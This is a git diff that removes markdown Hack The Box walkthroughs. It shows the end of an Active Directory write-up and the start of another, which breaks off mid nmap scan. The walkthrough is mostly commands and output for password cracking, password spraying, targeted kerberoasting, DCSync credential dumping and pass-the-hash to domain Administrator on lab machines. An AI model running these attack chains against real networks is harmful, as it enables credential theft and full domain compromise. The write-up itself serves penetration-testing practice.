applied: -* Zero-Byte -* Single-Hash -* Single-Salt -* Slow-Hash-SIMD-LOOP - -ATTENTION! Potfile storage is disabled for this hash mode. -Passwords cracked during this session will NOT be stored to the potfile. -Consider using -o to save cracked passwords. - -Watchdog: Temperature abort trigger set to 90c - -Host memory allocated for this attack: 514 MB (12417 MB free) - -Dictionary cache hit: -* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -* Passwords.: 14344384 -* Bytes.....: 139921497 -* Keyspace..: 946729344 - -Cracking performance lower than expected?                   - -* Append -w 3 to the commandline. - This can cause your screen to lag. - -* Append -S to the commandline. - This has a drastic speed impact but can be better for specific attacks. - Typical scenarios are a small wordlist but a large ruleset. - -* Update your backend API runtime / driver the right way: - https://hashcat.net/faq/wrongdriver - -* Create more work items to make use of your parallelization power: - https://hashcat.net/faq/morework - -[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s - -Session..........: hashcat -Status...........: Running -Hash.Mode........: 5200 (Password Safe v3) -Hash.Target......: Backup.psafe3 -Time.Started.....: Wed Jun  3 18:41:51 2026 (43 secs) -Time.Estimated...: Sat Jun  6 01:51:55 2026 (2 days, 7 hours) -Kernel.Feature...: Pure Kernel (password length 0-256 bytes) -Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) -Guess.Mod........: Rules (/usr/share/doc/hashcat/rules/best66.rule) -Guess.Queue......: 1/1 (100.00%) -Speed.#01........:     4767 H/s (9.51ms) @ Accel:20 Loops:1024 Thr:1 Vec:8 -Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new) -Progress.........: 206560/946729344 (0.02%) -Rejected.........: 0/206560 (0.00%) -Restore.Point....: 3040/14344384 (0.02%) -Restore.Sub.#01..: Salt:0 Amplifier:37-38 Iteration:2048-2049 -Candidate.Engine.: Device Generator -Candidates.#01...: qwert123 -> imi123 -Hardware.Mon.#01.: Temp: 72c Util: 82% - -[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => -``` - -It takes too long, so we try it straight without rules : - -```bash ->  hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -hashcat (v7.1.2) starting - -OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project] -====================================================================================================================================== -* Device #01: cpu-haswell-AMD Ryzen 5 3500U with Radeon Vega Mobile Gfx, 8912/17824 MB (8912 MB allocatable), 8MCU - -Minimum password length supported by kernel: 0 -Maximum password length supported by kernel: 256 -Minimum salt length supported by kernel: 0 -Maximum salt length supported by kernel: 256 - -Hashes: 1 digests; 1 unique digests, 1 unique salts -Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates -Rules: 1 - -Optimizers applied: -* Zero-Byte -* Single-Hash -* Single-Salt -* Slow-Hash-SIMD-LOOP - -ATTENTION! Potfile storage is disabled for this hash mode. -Passwords cracked during this session will NOT be stored to the potfile. -Consider using -o to save cracked passwords. - -Watchdog: Temperature abort trigger set to 90c - -Host memory allocated for this attack: 514 MB (12733 MB free) - -Dictionary cache hit: -* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -* Passwords.: 14344384 -* Bytes.....: 139921497 -* Keyspace..: 14344384 - -Backup.psafe3:tekieromucho                                  -                                                           -Session..........: hashcat -Status...........: Cracked -Hash.Mode........: 5200 (Password Safe v3) -Hash.Target......: Backup.psafe3 -Time.Started.....: Wed Jun  3 18:43:01 2026 (1 sec) -Time.Estimated...: Wed Jun  3 18:43:02 2026 (0 secs) -Kernel.Feature...: Pure Kernel (password length 0-256 bytes) -Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) -Guess.Queue......: 1/1 (100.00%) -Speed.#01........:     6399 H/s (12.54ms) @ Accel:32 Loops:1024 Thr:1 Vec:8 -Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) -Progress.........: 4864/14344384 (0.03%) -Rejected.........: 0/4864 (0.00%) -Restore.Point....: 4608/14344384 (0.03%) -Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:2048-2049 -Candidate.Engine.: Device Generator -Candidates.#01...: terminator -> daryl -Hardware.Mon.#01.: Temp: 71c Util: 47% - -Started: Wed Jun  3 18:42:59 2026 -Stopped: Wed Jun  3 18:43:03 2026 -``` - -`Backup.psafe3:tekieromucho` - -We then decrypt the backup with its master password and get : - -``` -alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw  # Alexander Smith -emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur  # Emma Johnson -emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb  # Emily Rodriguez` -``` - -So we built two separate files : - -```nano - GNU nano 9.0                                                                                         pass.txt                                                                                         Modified    -UrkIbagoxMyUGw0aPlj9B0AXSea4Sw                     -WwANQWnmJnGV07WQN8bMS7FMAbjNur                  -UXLCI5iETUsIBoFVTj8yQFKoHjXmb - - GNU nano 9.0                                                                                         users.txt -emma -alexander -emily -``` - -Then we spray : - -```bash ->  nxc winrm 10.129.12.40 -u users.txt -p pass.txt --continue-on-success -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\emma:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\emily:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\alexander:WwANQWnmJnGV07WQN8bMS7FMAbjNur -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\emily:WwANQWnmJnGV07WQN8bMS7FMAbjNur -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\emma:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\alexander:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -WINRM       10.129.12.40    5985   DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb (Pwn3d!) -``` - -And we got a shell on `emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb`. -This must be foothold. - -```PowerShell ->  evil-winrm -i 10.129.12.40 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset... -*Evil-WinRM* PS C:\Users\emily\Documents> cd /Users/emily/Desktop -*Evil-WinRM* PS C:\Users\emily\Desktop> ls - - -   Directory: C:\Users\emily\Desktop - - -Mode                 LastWriteTime         Length Name -----                 -------------         ------ ---- --a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk --ar---          6/3/2026   3:44 PM             34 user.txt - - -*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt -90e524*************3db793 -``` - -And it is. - -```PowerShell -*Evil-WinRM* PS C:\Users\emily\Desktop> whoami /priv - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                    State -============================= ============================== ======= -SeMachineAccountPrivilege     Add workstations to domain     Enabled -SeChangeNotifyPrivilege       Bypass traverse checking       Enabled -SeIncreaseWorkingSetPrivilege Increase a process working set Enabled -*Evil-WinRM* PS C:\Users\emily\Desktop> whoami /groups - -GROUP INFORMATION ------------------ - -Group Name                                  Type             SID          Attributes -=========================================== ================ ============ ================================================== -Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group -BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group -BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group -BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group -NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group -Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448 -*Evil-WinRM* PS C:\Users\emily\Desktop> -``` - -Nothing special, so we open `bloodhound` again to check on `emily`'s privileges. - -She has `GenericWrite` on `ethan`. - -We need to adjust the time to the machine before kerberoasting. - -```bash ->  nmap -p445 --script smb2-time -Pn 10.129.12.40 - -Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-03 19:30 +0200 -Nmap scan report for administrator.htb (10.129.12.40) -Host is up (0.047s latency). - -PORT    STATE SERVICE -445/tcp open  microsoft-ds - -Host script results: -| smb2-time:   -|   date: 2026-06-04T00:30:09 -|_  start_date: N/A -``` - -We see it's `00:30` (UTC) so we set the time and request a hash : - -```bash ->  sudo timedatectl set-ntp false -sudo date -u -s '2026-06-04 00:30:09' -date -u -Thu Jun  4 12:30:09 AM UTC 2026 -Thu Jun  4 12:30:09 AM UTC 2026 ->  targetedkerberoast --dc-ip 10.129.12.40 -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --request-user ethan -o ethan.hash -v - -[*] Starting kerberoast attacks -[*] Attacking user (ethan) -[VERBOSE] SPN added successfully for (ethan) -[+] Writing hash to file for (ethan) -[VERBOSE] SPN removed successfully for (ethan) -``` - -Then, we crack the hash we requested using `Kerberos TGS etype 23` mode for hashcat which is `13100` : and we get a - -```bash ->  hashcat -a 0 -m 13100 ethan.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt - -hashcat (v7.1.2) starting - -OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project] -====================================================================================================================================== -* Device #01: cpu-haswell-AMD Ryzen 5 3500U with Radeon Vega Mobile Gfx, 8912/17824 MB (8912 MB allocatable), 8MCU - -Minimum password length supported by kernel: 0 -Maximum password length supported by kernel: 256 -Minimum salt length supported by kernel: 0 -Maximum salt length supported by kernel: 256 - -Hashes: 1 digests; 1 unique digests, 1 unique salts -Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates -Rules: 1 - -Optimizers applied: -* Zero-Byte -* Not-Iterated -* Single-Hash -* Single-Salt - -ATTENTION! Pure (unoptimized) backend kernels selected. -Pure kernels can crack longer passwords, but drastically reduce performance. -If you want to switch to optimized kernels, append -O to your commandline. -See the above message to find out about the exact limits. - -Watchdog: Temperature abort trigger set to 90c - -Host memory allocated for this attack: 514 MB (15208 MB free) - -Dictionary cache hit: -* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -* Passwords.: 14344384 -* Bytes.....: 139921497 -* Keyspace..: 14344384 - -$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$47b617cacb26fe6352b093828f4dfa82$b1ede0a6b28378a14927940052db4959d1f89ffd68ab027d4e2c26daa44f5973dd8e26c52b4d766821c216a7bf6c8a7528adbfcd6e39018c0d0 -9f9fa16ed39a2467b12a4f188c4703ca661bdc41d18f2c0f6218165dae7a83e11c5ffda68e153470e0b2a1a7c3ea20cc251ae1cb4020640a54a75bc4e3caa878948cb2fb7f66ba474eaeb76a5e59a5e682f136dd9096d8e87370c44c4706694fd4d81cd8a99ef195fb -182de4e368b14b4d36a7d13f77f4cff440b22d234922defa2793ecc9fcf5695ff51ccbfdb83d69bb473b514823bc6fe7b9a821eba656e99d34edfac8d27f9a121d388002b44afbe38f333551a62afbce61a68d1426bebb460a125961810a7cd6889240c42c4b8b5d72 -ee64a29e4e71c704e4dea2bbcb8daf4e873775157db2c6679437661f994792ad80ca928c5e9a0cd4e852cafa0dfc2e6a01f556e7aec3cb12df8edba6bf792dcb4c0640e14dd3a5e42eaad8f162145afd4379186f9e3fdd93cb7a01ff63614dde5f7fd81a18bb32738b -366114308684d6df6f3fa567db6e0453a581c6dcb1009310b03f0d50cdd574f4e97b60a0d16367694a21231b0003fae4ff5127adc360ce420918f601af8beb31818374850ddd062b88bfd7955f9f57836544df1ab3e9e7db455522d894d238efa24adb9b4985b79414 -5bdffcbadc227768cd700a07c89898dba19ba7c8b1830f4c6af4fcd5100c640129fa2e6abe235ff6bb7279b6d7e9b94caa2d0b6aafab2ddbbc89f45a379d6c106c4407fc8469a91797c2acd198d47a1c35d899243dba00df576b75553149250f96cf3459311c441370 -d1a11ac8ca7359810c08c3c89ca9e2d13bcfc41ad32c248165a81f7233c0dfbdfff3f1d64b8c2be9359522a81215d5eaf95f4f53626388b2e0f5583e371732c705c2033aaf999ead598418f1c5c1062c1cbe0a3ea469f2cef2fcdf3318feec24a5622893f4b6315685 -0e723cbc5b7c6a28bbe9f08642cef0a84d1152dbf9dccd1b0be4deefe426ca7bf95c25bd02bacee574a6081b36d81e3e19352ee0ce3f615c24d39222dce07cb1ba9fe010d3f268a7f133cb8677afdbce464f98576e5c008a2e7c33891096bc05ed1fbb788c6823a2b7 -9e6e3c0a24015263a9fd870b88da8d46f7d36fdf5c64e999d110a4c4ac128545c0f2920b1f09e2e85f188544073ef4c838dc835fd77a4814b7c72b1e40f4dbf11708c7c107da349d5710e33f6bcf9e901986a6568b6ce57d35f09b051388221f9ae312d40f879f61f6 -5b8734b5eaf1e7862c8f1b67afcdcb2f35de15ee6852f245f24a681ec05062c078224de187ceb423ecb80ae891d48b14b3338b11cd70a6eb15578c663fc3cb29137224af08356f531c4210b1e8f68495f859b72d487fa568844356bb9c077880a0c40f5da1928f9c50 -3a07f858bc85fc8ccbd3704be727b71c50806d392cc4027868042b1b6e8e48a7402baf466549cd10f0dce206bfbd45d2cbbd886657be3bfdd1c74e92a2b60ea86548ff93fc29832a2cf60833305e6646a07abee56:limpbizkit -                                                           -Session..........: hashcat -Status...........: Cracked -Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) -Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....abee56 -Time.Started.....: Thu Jun  4 02:32:01 2026 (0 secs) -Time.Estimated...: Thu Jun  4 02:32:01 2026 (0 secs) -Kernel.Feature...: Pure Kernel (password length 0-256 bytes) -Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) -Guess.Queue......: 1/1 (100.00%) -Speed.#01........:  1015.6 kH/s (4.88ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 -Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) -Progress.........: 8192/14344384 (0.06%) -Rejected.........: 0/8192 (0.00%) -Restore.Point....: 0/14344384 (0.00%) -Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1 -Candidate.Engine.: Device Generator -Candidates.#01...: 123456 -> total90 -Hardware.Mon.#01.: Temp: 71c Util: 35% - -Started: Thu Jun  4 02:31:59 2026 -Stopped: Thu Jun  4 02:32:03 2026 -``` - -`limpbizkit` it is. - -```bash ->  nxc smb 10.129.12.40 -u ethan -p 'limpbizkit' --shares - -SMB         10.129.12.40    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True) -SMB         10.129.12.40    445    DC               [+] administrator.htb\ethan:limpbizkit   -SMB         10.129.12.40    445    DC               [*] Enumerated shares -SMB         10.129.12.40    445    DC               Share           Permissions     Remark -SMB         10.129.12.40    445    DC               -----           -----------     ------ -SMB         10.129.12.40    445    DC               ADMIN$                          Remote Admin -SMB         10.129.12.40    445    DC               C$                              Default share -SMB         10.129.12.40    445    DC               IPC$            READ            Remote IPC -SMB         10.129.12.40    445    DC               NETLOGON        READ            Logon server share   -SMB         10.129.12.40    445    DC               SYSVOL          READ            Logon server share   ->  nxc winrm 10.129.12.40 -u ethan -p 'limpbizkit' -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [-] administrator.htb\ethan:limpbizkit -``` - -So we have the same rights as everyone else on smb but no shell. Maybe we can access a private directory, but first we'll check ethan's privileges on `bloodhound`. - -We got nothing on `bloodhound`, the only privilege is towards `emily`. - -```bash ->  smbclient //10.129.12.40/SYSVOL -U ethan%limpbizkit -Try "help" to get a list of possible commands. -smb: \> ls - .                                   D        0  Fri Oct  4 21:48:08 2024 - ..                                  D        0  Fri Oct  4 21:48:08 2024 - administrator.htb                  Dr        0  Fri Oct  4 21:48:08 2024 -smb: \> cd administrator.htb -smb: \administrator.htb\> ls - .                                   D        0  Fri Oct  4 21:54:15 2024 - ..                                  D        0  Fri Oct  4 21:48:08 2024 - DfsrPrivate                      DHSr        0  Fri Oct  4 21:54:15 2024 - Policies                            D        0  Fri Oct  4 21:48:32 2024 - scripts                             D        0  Fri Oct  4 21:48:08 2024 - -               5606911 blocks of size 4096. 2075101 blocks available -smb: \administrator.htb\> cd DfsrPrivate -cd \administrator.htb\DfsrPrivate\: NT_STATUS_ACCESS_DENIED -``` - -And we don't. - -Our only way is to get a new database for bloodhound from `ethan` and hope we find a privilege. - -```bash ->  bloodhound-python -d administrator.htb -c All -u ethan -p 'limpbizkit' -ns 10.129.12.40 --zip - -INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) -INFO: Found AD domain: administrator.htb -INFO: Getting TGT for user -INFO: Connecting to LDAP server: dc.administrator.htb -INFO: Found 1 domains -INFO: Found 1 domains in the forest -INFO: Found 1 computers -INFO: Connecting to LDAP server: dc.administrator.htb -INFO: Found 11 users -INFO: Found 53 groups -INFO: Found 2 gpos -INFO: Found 1 ous -INFO: Found 19 containers -INFO: Found 0 trusts -INFO: Starting computer enumeration with 10 workers -INFO: Querying computer: dc.administrator.htb -INFO: Done in 00M 27S -INFO: Compressing output into 20260604024553_bloodhound.zip -``` - -After erasing the old database and putting in the new one, we can see we have four outbound rights towards `administrator` : `GetChanges, GetChangesAll, GetChangesInFilteredSet and DCsync`. - -Time to use Impacket and get that sweet NT:LM Administrator hash, hopefully : - -```bash ->  secretsdump.py -just-dc administrator.htb/ethan@10.129.12.40 -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -Password: -[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) -[*] Using the DRSUAPI method to get NTDS.DIT secrets -Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: -Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: -krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6::: -administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7::: -administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:4d3aa5fca989c0334ba7e2f48e26f79b::: -administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:4d3aa5fca989c0334ba7e2f48e26f79b::: -administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31::: -administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884::: -administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199::: -administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9::: -DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3::: -[*] Kerberos keys grabbed -Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 -Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 -Administrator:des-cbc-md5:403286f7cdf18385 -krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648 -krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94 -krbtgt:des-cbc-md5:2c0bc7d0250dbfc7 -administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3 -administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48 -administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9 -administrator.htb\michael:aes256-cts-hmac-sha1-96:e9337a2048fa0adeddb613a9c2d14caeb9ec9e92e671d9826f55dad6d9246f5c -administrator.htb\michael:aes128-cts-hmac-sha1-96:0f09c39092307b75ccb7f8431891b58b -administrator.htb\michael:des-cbc-md5:d09e45d38abf0207 -administrator.htb\benjamin:aes256-cts-hmac-sha1-96:4651f47cc6ae4c7566ba6fa9878584cde0b359849d8dee8b887313d6586891bc -administrator.htb\benjamin:aes128-cts-hmac-sha1-96:3eeab8b2684736d8e0acddc68dae0211 -administrator.htb\benjamin:des-cbc-md5:bf029b86cb515d7a -administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4 -administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218 -administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51 -administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f -administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f -administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb -administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6 -administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade -administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf -administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82 -administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e -administrator.htb\emma:des-cbc-md5:3249fba89813ef5d -DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb -DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d -DC$:des-cbc-md5:f483547c4325492a -[*] Cleaning up... -``` - -And we got it ! `aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e` - -We can just use Pass-The-Hash with the actual useful portion, `3dc533..` : - -```bash ->  nxc winrm 10.129.12.40 -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e" -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!) -``` - -Gotcha. - -```PowerShell ->  nxc winrm 10.129.12.40 -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e" -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!) ->  evil-winrm -i 10.129.12.40 -u Administrator -H ">  nxc winrm 10.129.12.40 -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e" -WINRM       10.129.12.40    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)   -WINRM       10.129.12.40    5985   DC               [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!) - ->  evil-winrm -i 10.129.12.40 -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e" - -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:/Users/Administrator/Desktop/root.txt -6467**********9d8688465298 -``` - -And we got root. - -Now, we reset the clock to get back to the actual real-world time of where the fuck I am (which I will not reveal for OpSec reasons) : - -```bash -sudo timedatectl set-ntp true -``` diff --git a/BabyTwo HTB [MEDIUM].md b/BabyTwo HTB [MEDIUM].md deleted file mode 100644 index 165b1dc..0000000 --- a/BabyTwo HTB [MEDIUM].md +++ /dev/null @@ -1,991 +0,0 @@ - -Target :10.129.13.186 - -Date : 05/06/2026 - -Machine Information : "The User flag for this Box is located in a non-standard directory, C:." - -```bash ->  echo "10.129.13.186 babytwo.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.13.186 babytwo.htb ->  nmap -Pn -sV -sC -O -p- --min-rate=3000 -T410.129.13.186 -Nmap scan report for babytwo.htb (10.129.13.186) -Host is up (0.11s latency). -Not shown: 65517 filtered tcp ports (no-response) -PORT      STATE SERVICE       VERSION -53/tcp    open  domain        Simple DNS Plus -88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-05 14:04:35Z) -135/tcp   open  msrpc         Microsoft Windows RPC -139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn -389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name) -|_ssl-date: TLS randomness does not represent time -| ssl-cert: Subject:   -| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2 -| Not valid before: 2025-08-19T14:22:11 -|_Not valid after:  2105-08-19T14:22:11 -445/tcp   open  microsoft-ds? -464/tcp   open  kpasswd5? -593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0 -636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name) -| ssl-cert: Subject:   -| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2 -| Not valid before: 2025-08-19T14:22:11 -|_Not valid after:  2105-08-19T14:22:11 -|_ssl-date: TLS randomness does not represent time -3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl, Site: Default-First-Site-Name) -|_ssl-date: TLS randomness does not represent time -| ssl-cert: Subject:   -| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2 -| Not valid before: 2025-08-19T14:22:11 -|_Not valid after:  2105-08-19T14:22:11 -3389/tcp  open  ms-wbt-server Microsoft Terminal Services -|_ssl-date: 2026-06-05T14:06:10+00:00; 0s from scanner time. -| ssl-cert: Subject: commonName=dc.baby2.vl -| Not valid before: 2026-06-04T13:53:54 -|_Not valid after:  2026-12-04T13:53:54 -| rdp-ntlm-info:   -|   Target_Name: BABY2 -|   NetBIOS_Domain_Name: BABY2 -|   NetBIOS_Computer_Name: DC -|   DNS_Domain_Name: baby2.vl -|   DNS_Computer_Name: dc.baby2.vl -|   DNS_Tree_Name: baby2.vl -|   Product_Version: 10.0.20348 -|_  System_Time: 2026-06-05T14:05:31+00:00 -9389/tcp  open  mc-nmf        .NET Message Framing -49664/tcp open  msrpc         Microsoft Windows RPC -49667/tcp open  msrpc         Microsoft Windows RPC -55068/tcp open  msrpc         Microsoft Windows RPC -62275/tcp open  msrpc         Microsoft Windows RPC -64275/tcp open  msrpc         Microsoft Windows RPC -64278/tcp open  msrpc         Microsoft 